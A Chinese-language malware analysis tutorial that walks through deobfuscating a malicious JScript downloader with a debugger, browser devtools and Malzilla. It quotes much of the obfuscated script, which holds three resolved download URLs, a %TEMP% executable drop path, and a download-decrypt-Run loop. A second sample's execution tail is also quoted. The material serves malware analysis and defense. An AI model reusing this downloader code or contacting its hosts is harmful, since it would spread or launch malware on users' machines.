此網站可以做一部分的網頁解密
網頁的初始解密部分不再詳細說明,在最後的附檔當中直接提供解密方法。但現在很多網頁即使代碼已經是最終版,其中也增加了很多函數等,把病毒的下載地址弄得很分散,從表面上是看不出來從哪裡下載的。
那直接執行又有風險,所以我們可以使用調試工具來分析,在關鍵位置下斷點,畢竟腳本還是要執行,那些變量最終還是要確實地變成實際的內容。
當然還是建議在虛擬機環境然後斷開網路的情況下做以下分析
在此提供兩種方法,第一種方法比較繁瑣需要安裝程式,第二種相對就簡單很多。
準備的程式為Visual Studio,我是用2008舉例,安裝的時候我是選擇下列組件,是不是還可以精簡就不知道了。
安裝完畢後,我們在CMD中執行
wscript /x 是調試模式
執行後就會調用VS進行調試
直接點“是”,會開啟VS
圖中黑色的部分是對腳本是選擇執行、暫停、停止
藍色的部分是腳本的代碼
紅色的部分是對應裡面的變量,因為目前都還沒有執行,所以對應的值還是不確定的,而我們恰恰就是要裡面最後的一些值
我們先截取一部分代碼,完整的代碼最後用附檔的方式提供
/*
 * Obfuscated Windows Script Host (JScript) downloader, head of the script as quoted in the post.
 * This excerpt is only the beginning: the script continues past the end of this listing (the post
 * says the full file is in the attachment), so the download/decode/run logic is not visible here.
 *
 * Obfuscation pattern, all of it visible below:
 *   - every string is chopped into 2-5 character fragments held in throw-away variables;
 *   - `x["" + "c" + "" + "h" + "ar" + "A" + "t"](i)` is just `x.charAt(i)`;
 *   - `function f(a) { return a; }` and `(function () { return v; }())` are identity wrappers;
 *   - the fragments spell COM ProgIDs and method names ("ADODB.Stream", "CreateObject", "SaveToFile",
 *     "ResponseBody", "WriteText", "LoadFromFile", "ReadText", "charset", "type", "open", "close",
 *     "GET", "Run", "Sleep"); presumably they are assembled in the part of the script that is cut off.
 *
 * The resolved values in the comments below were obtained by concatenating the fragments by hand;
 * nothing in this listing needs to be executed to read them.
 */
var ttends = "th"; var tdreed = "ng"; var trandom = "le"; var tflexwhitespace = "gth"; var tleppek = "len"; var tparticleradius = "xpeZz"; var tradtodeg = tparticleradius["" + "c" + "" + "h" + "ar" + "A" + "t"](2); var tm = "os"; var tcollisionend = "cl"; var tmsg = "le"; var tdoxie = "ToFi"; var smi = "Save"; var sothumbnailslist = "Text"; var sacross = "write"; var stends = "open"; var sdreed = "et"; var srandom = "ars"; var sflexwhitespace = "Ch"; var sm = "Je"; var sleppek = sm["" + "c" + "" + "h" + "ar" + "A" + "t"](1); var sradtodeg = "typ"; var scollisionend = "tream"; var sparticleradius = ".S"; var smsg = "ADODB"; var sdoxie = "ct"; var rmi = "eObje"; var rrenderer = "at"; var rhtc = "Cre"; var rothumbnailslist = "ose"; var racross = "cl"; var rdreed = "xt"; var rrandom = "Te"; var rflexwhitespace = "Read"; var rradtodeg = "ile"; var rm = "romF"; var rcollisionend = "LoadF"; var rparticleradius = "open"; function qmi(rdoxie) { return rdoxie; }; var qrenderer = "et"; var qhtc = "Chars"; var qothumbnailslist = "type"; var qacross = "am"; var qtends = "re"; var qdreed = "B.St"; var qrandom = "ADOD"; var qflexwhitespace = "ct"; var qleppek = "bje"; var qradtodeg = "teO"; var qm = "ea"; var qcollisionend = "Cr"; var qparticleradius = "th"; var qmsg = "leng"; function pothumbnailslist(phtc) { return phtc; }; function pmi(qdoxie) { return qdoxie; }; var ptends = "X1"; var pdreed = "fG"; var prandom = "vWpDX"; var pflexwhitespace = "JOi"; var pleppek = "XSqB"; var pradtodeg = "sdv"; var pm = "oFav"; var pcollisionend = "A6"; var pparticleradius = "XV5"; var pmsg = "gth"; var pdoxie = "len"; var ohtc = "7QPih"; var omi = ohtc["" + "c" + "" + "h" + "ar" + "A" + "t"](4); var orenderer = "lengt"; var otends = "0h"; var oothumbnailslist = otends["" + "c" + "" + "h" + "ar" + "A" + "t"](1); var oacross = "lengt"; var orandom = "ice"; var oflexwhitespace = "spl"; var oleppek = "gth"; var oradtodeg = "len"; var om = "th"; var ocollisionend = "leng"; var oparticleradius = 
"gth"; var omsg = "len"; var odoxie = "th"; var nmi = "leng"; var nrenderer = "eep"; var nhtc = "Sl"; var nacross = "Run"; var ntends = "ngth"; var ndreed = "le"; var nleppek = "hcs"; var nrandom = nleppek["" + "c" + "" + "h" + "ar" + "A" + "t"](0); var nflexwhitespace = "lengt"; var nradtodeg = "close"; var nm = "ile"; var ncollisionend = "veToF"; var nparticleradius = "Sa"; var mothumbnailslist = "DCIn"; var ndoxie = mothumbnailslist["" + "c" + "" + "h" + "ar" + "A" + "t"](3); var mmi = "io"; var mrenderer = "it"; var mhtc = "pos"; var mtends = "Body"; var mdreed = "se"; var mrandom = "spon"; var mflexwhitespace = "Re"; function mradtodeg(mleppek) { return mleppek; }; var mm = "ite"; var mcollisionend = "wr"; function mmsg(mparticleradius) { return mparticleradius; }; var mdoxie = "type"; var lmi = "open"; function lhtc(lrenderer) { return lrenderer; }; var lothumbnailslist = "eam"; var lacross = ".Str"; var ltends = "ADODB"; var ldreed = "ct"; var lrandom = "Obje"; var lflexwhitespace = "te"; var lleppek = "Crea"; var lradtodeg = "p"; var lm = "Slee"; var lcollisionend = "nd"; var lparticleradius = "se"; var krenderer = "5S6Mhv"; var lmsg = krenderer["" + "c" + "" + "h" + "ar" + "A" + "t"](4); var ldoxie = "ngt"; var kmi = "le"; var khtc = "GET"; function kdreed(ktends) { return ktends; }; var kflexwhitespace = "n"; var kleppek = "ope"; function jrenderer(jmi) { return jmi; }; function kdoxie(kmsg) { return kmsg; }; function kparticleradius(kcollisionend) { return kcollisionend; }; function km(kradtodeg) { return kradtodeg; }; var jhtc = "ep"; var jothumbnailslist = "Sle"; var jacross = "th"; var jtends = "leng"; var jdreed = "ct"; var jrandom = "eObje"; var jflexwhitespace = "Creat"; var jleppek = "th"; var jradtodeg = "leng"; function jcollisionend(jm) { return jm; }; var jmsg = "TP"; var jdoxie = "XMLHT"; var imi = "XML2."; var irenderer = "MS"; function iothumbnailslist(ihtc) { return ihtc; }; var idreed = ".1"; var irandom = "t.5"; var iflexwhitespace = 
"eques"; var ileppek = "ttpR"; var iradtodeg = "inH"; var im = "tp.W"; var icollisionend = "WinHt"; var iparticleradius = "xe"; var imsg = ".e"; function hrenderer(hmi) { return hmi; }; var hhtc = "FW"; var hothumbnailslist = "4B"; var hacross = "qBSfm"; var htends = "7Kr"; function hrandom(hdreed) { return hdreed; }; var hm = "C8il/XBT"; var hflexwhitespace = hm["" + "c" + "" + "h" + "ar" + "A" + "t"](4); var hleppek = "EMP%"; var hradtodeg = "%T"; function hparticleradius(hcollisionend) { return hcollisionend; }; var gacross = "DPoliCS"; var hdoxie = gacross["" + "c" + "" + "h" + "ar" + "A" + "t"](3); var gmi = ".Shel"; var grenderer = "pt"; var ghtc = "ri"; var gothumbnailslist = "WSc"; function gcollisionend(gm) { return gm; }; function gradtodeg(gleppek) { return gleppek; }; function gflexwhitespace(grandom) { return grandom; }; var gmsg = "ct"; var gdoxie = "je"; var fmi = "Ob"; var frenderer = "te"; var fhtc = "Crea"; var fothumbnailslist = "v83"; var facross = "odwh9"; var ftends = "78/"; var fdreed = "03."; var fflexwhitespace = "1"; var fleppek = "1."; var fradtodeg = ".1"; var fm = "://52"; var fcollisionend = "http"; function fmsg(fparticleradius) { return fparticleradius; }; var erenderer = "pfmKc"; var fdoxie = erenderer["" + "c" + "" + "h" + "ar" + "A" + "t"](2); var emi = "1x"; var ehtc = "/15"; var eothumbnailslist = "org"; var eacross = "."; var etends = "-ccd"; function erandom(edreed) { return edreed; }; var eflexwhitespace = "cdc"; var eleppek = "w."; var eradtodeg = "w"; var em = "//w"; var ecollisionend = "tp:"; var eparticleradius = "ht"; var edoxie = "38p9gC"; var emsg = edoxie["" + "c" + "" + "h" + "ar" + "A" + "t"](4); var dhtc = "ymqEu"; var dmi = dhtc["" + "c" + "" + "h" + "ar" + "A" + "t"](1); var drenderer = "210l"; var dothumbnailslist = "s/69"; var dtends = ".e"; var drandom = "ght"; var dflexwhitespace = "ytoni"; function dradtodeg(dleppek) { return dleppek; }; var dm = ".cit"; var dcollisionend = "www"; var dmsg = "p://"; var 
ddoxie = "htt"; var cmi = "437"; function brenderer(bmi) { return bmi; }; function cdoxie(cmsg) { return cmsg; }; function cparticleradius(ccollisionend) { return ccollisionend; }; function cm(cradtodeg) { return cradtodeg; }; function cleppek(cflexwhitespace) { return cflexwhitespace; }; function cacross(cothumbnailslist) { return cothumbnailslist; }; function chtc(crenderer) { return crenderer; }; var bhtc = "th"; var bothumbnailslist = "ng"; var bacross = "le"; var btends = "AAAA"; var bdreed = "AAA"; var brandom = "AAAAI"; var bflexwhitespace = "AAA"; var bleppek = "AA"; var bradtodeg = "AAAAAAAAAIAAAAAAA";
/* aparticleradius = bradtodeg["le" + "ng" + "th"], i.e. bradtodeg.length (17). The b* "AAA..." strings look like filler; what the length is used for is not visible in this excerpt. */
var aparticleradius /* OMq Imf xFk */ = bradtodeg[brenderer(bacross) + bothumbnailslist + bhtc]; var dreed = 1; var ahtc = 2; var adreed = 2; var bm = "437";
/* arenderer: the three download URLs the post extracts with the debugger. Resolved by hand from the d*/e*/f* fragments (dmi = "ymqEu".charAt(1) = "m", emsg = "38p9gC".charAt(4) = "g", fdoxie = "pfmKc".charAt(2) = "m"):
 *   [0] "http://www.citytonight.es/69210lmg"
 *   [1] "http://www.cdc-ccd.org/151xm"
 *   [2] "http://52.11.103.78/odwh9v83"
 * Historical indicators only — the post notes the original address is no longer live. */
var arenderer = [ddoxie + (function dparticleradius() { return dmsg; }()) + dcollisionend + dradtodeg(dm) + dflexwhitespace + (function ddreed() { return drandom; }()) + dtends + dothumbnailslist + drenderer + dmi + emsg, eparticleradius + ecollisionend + em + eradtodeg + eleppek + erandom(eflexwhitespace) + etends + eacross + eothumbnailslist + ehtc + fmsg(emi) + fdoxie, fcollisionend + fm + fradtodeg + fleppek + (function frandom() { return fflexwhitespace; }()) + fdreed + ftends + facross + fothumbnailslist];
/* bcollisionend = WScript["Crea" + "te" + "Ob" + "je" + "ct"]("WSc" + "ri" + "pt" + ".Shel" + "l"), i.e. WScript.CreateObject("WScript.Shell").
 * This is the first statement that does more than build strings; the post puts its breakpoint here so arenderer is resolved but nothing has run yet. */
var bcollisionend = WScript[fhtc + (function gparticleradius() { return frenderer; }()) + gcollisionend(fmi) + gdoxie + gmsg](gothumbnailslist + ghtc + grenderer + (function hmsg() { return gmi; }()) + hparticleradius(hdoxie));
/* random = shell.ExpandEnvironmentStrings("%T" + "EMP%" + "/") — hflexwhitespace is "C8il/XBT".charAt(4), a forward slash — so the expanded %TEMP% directory. */
var random = bcollisionend.ExpandEnvironmentStrings(hrandom(hradtodeg) + hleppek + hflexwhitespace);
/* adoxie = %TEMP%/7KrqBSfm4BFW; arandom appends ".e" + "xe", giving "%TEMP%/7KrqBSfm4BFW.exe" — the drop path that the post later shows being passed to Run. */
var adoxie = random + hrenderer(htends) + hacross + (function idoxie() { return hothumbnailslist; }()) + hhtc; var arandom = adoxie + (function dacross() { return dtends; }()) + iparticleradius;
/* across = ["WinHttp.WinHttpRequest.5.1", "MSXML2.XMLHTTP"] — two COM HTTP client ProgIDs; presumably tried in turn by the download loop that follows this excerpt. */
var across = [icollisionend + (function itends() { return im; }()) + (function iacross() { return iradtodeg; }()) + ileppek + iothumbnailslist(iflexwhitespace) + irandom + idreed, 
(function jparticleradius() { return irenderer; }()) + jcollisionend(imi) + jdoxie + jmsg];
前面可以找到一些看起來像是網址片段的變量,用這些變量搜索它們會出現在後面的哪個位置,因為在後面肯定是要組合成一個完整的網址,從代碼中大概可以知道,是在下面這段
/* arenderer: the three download URLs, assembled from string fragments declared earlier in the script
 * (dradtodeg/erandom/fmsg are identity functions, the IIFEs just return a constant). Resolved by hand:
 *   [0] "http://www.citytonight.es/69210lmg"
 *   [1] "http://www.cdc-ccd.org/151xm"
 *   [2] "http://52.11.103.78/odwh9v83"
 * Up to and including this statement the script only builds strings, which is why the post breaks right after it. */
var arenderer = [ddoxie + (function dparticleradius() {return dmsg;}()) + dcollisionend + dradtodeg(dm) + dflexwhitespace + (function ddreed() {return drandom;}()) + dtends + dothumbnailslist + drenderer + dmi + emsg, eparticleradius + ecollisionend + em + eradtodeg + eleppek + erandom(eflexwhitespace) + etends + eacross + eothumbnailslist + ehtc + fmsg(emi) + fdoxie, fcollisionend + fm + fradtodeg + fleppek + (function frandom() {return fflexwhitespace;}()) + fdreed + ftends + facross + fothumbnailslist];
那我們就在這段的後面下斷點
下斷點後就會顯示下面的樣子,同時也可以看到arenderer的內容目前也是不知道的
現在我們按綠色箭頭開始執行,然後就馬上會在我們下斷點的bcollisionend的地方停止下來,而arenderer的值也已經顯示出來了
就是我們需要的JS腳本會去下載的鏈接,此例子當中是3個地址
當然如果你確定是在哪裡下斷點又不會讓病毒下載下來執行,就可以稍微後面一點下斷點,就可以獲取到更多的一些資訊了,比如下載下來的文件放在本機的位置及名字等等。
上面這個是一種方法,其實還有更簡單的方法,就是使用瀏覽器的開發人員工具,在chrome和firefox來說都是按F12。因為這是針對當前頁面調試,所以就不建議整個去執行,這樣就會把它激活了(當然還是建議在斷開網路的情況下執行)。我們就只截取一段,比方截到上述arenderer的結尾,後面的部分全部砍掉;截下來的這段只剩下字串拼接、恆等函數和charAt,沒有任何建立物件、下載或執行的呼叫,這樣即使可以執行也不會有安全的風險。前面後面加<script>及</script>,然後保存為htm的網頁文件,打開chrome,按F12,然後把這個網頁拖到chrome裡,點擊sources,然後點左下角你剛才開啟的網頁文件,代碼的部分就會顯示在中間。因為我只需要了解arenderer的值而已,所以定位到arenderer後,右鍵選擇"Add to watch",然後就可以從右邊看到此項的值了,非常的快速簡單。
最後附對應的原始病毒js檔及對應的解密方法,解壓縮密碼為infected
如果是使用malzilla解密,則可以參考下面方式,首先需要把前面的/*@cc_on和@*/刪除,然後把代碼粘貼到程式當中,因為是eval的,所以我們在replace eval()後填寫eval,然後執行run script,下面就會顯示出來解密的代碼了。
有了代碼,但因為裏面還有很多\x這樣16進制的內容,所以我再貼到misc decoders 的text當中,下面自訂前綴為 \x ,然後點decode Hex,上面顯示的就是最終的解密內容了。
上述的js從Http下載下來的文件是病毒本體嗎?其實不是,是下載經過加密後的執行檔,js把文件下載後,會調用後半段的函數將下載的文件解密成執行檔,然後再執行,所以要么你能看懂裡面的解密函數自行解密,要么就是直接在虛擬機裡執行腳本。當然因為其行為就是 下載——解密——執行,我們可以把執行的代碼部分刪除掉
var bdoxie = msg /* OMq Imf xFk */ (adoxie); bdoxie = doxie(bdoxie); if (bdoxie[bacross + bothumbnailslist + cm(bhtc)] < 170 * 1024 || bdoxie[bacross + bothumbnailslist + bhtc] > (35 * 5 + 10) * 1024 || !radtodeg(bdoxie)) { amsg = 1; continue; } try { particleradius(arandom, bdoxie); } catch (e) { break; }; bcollisionend[(function nothumbnailslist() { return nacross; }())](arandom); break; } catch (e) { WScript[jothumbnailslist + km(jhtc)](3856 - 2856); continue; }; } while (amsg); WScript.Quit(0); |
是不是刪除得正確,不確定,因為原始地址已經失效了,其中的
/* jothumbnailslist is "Sle", jhtc is "ep" and km() returns its argument unchanged, so this is
 * WScript.Sleep(1000): the retry delay in the catch branch of the download loop before `continue`. */
WScript[jothumbnailslist + km(jhtc)](3856 - 2856);
是WScript.Sleep(1000),後面就是結束退出
前面的
/* particleradius() is not defined in any excerpt on this page; the post identifies it as the routine that
 * turns the downloaded blob (bdoxie) into the executable at arandom — TODO confirm against the full script.
 * The statement to remove for safe stepping is the Run() call that follows this one, not this call. */
particleradius(arandom, bdoxie);
是調用解密函數解密文件,所以下面的
/* nacross is "Run" and bcollisionend is the WScript.Shell object, so this is shell.Run(arandom):
 * the line that launches the dropped executable. This is the statement the post says to delete
 * before stepping the script; everything before it only downloads and decodes. */
bcollisionend[(function nothumbnailslist() { return nacross; }())](arandom);
應該就是執行文件了,並且其中的nacross在前面的值也剛好是 Run。
我們看另外一個案例
var cccccc = a(____ /* Nyq uNb wgE */); cccccc = _(cccccc); if (cccccc.length < 120 * 1024 || cccccc.length > 160 * 1024 || !__(cccccc)) { aaaa = 1; continue; } try { b(aaaaa, cccccc); } catch (e) {break;}; aaaaaaa.Run(aaaaa); break; } catch (e) {WScript.Sleep(1000); continue;}; } while (aaaa); WScript.Quit(0); |
這個就很明顯,就是aaaaaaa.Run(aaaaa);來執行檔案,b(aaaaa, cccccc);負責解密下載的文件。
此例的js及說明參考下面附檔,密碼是infected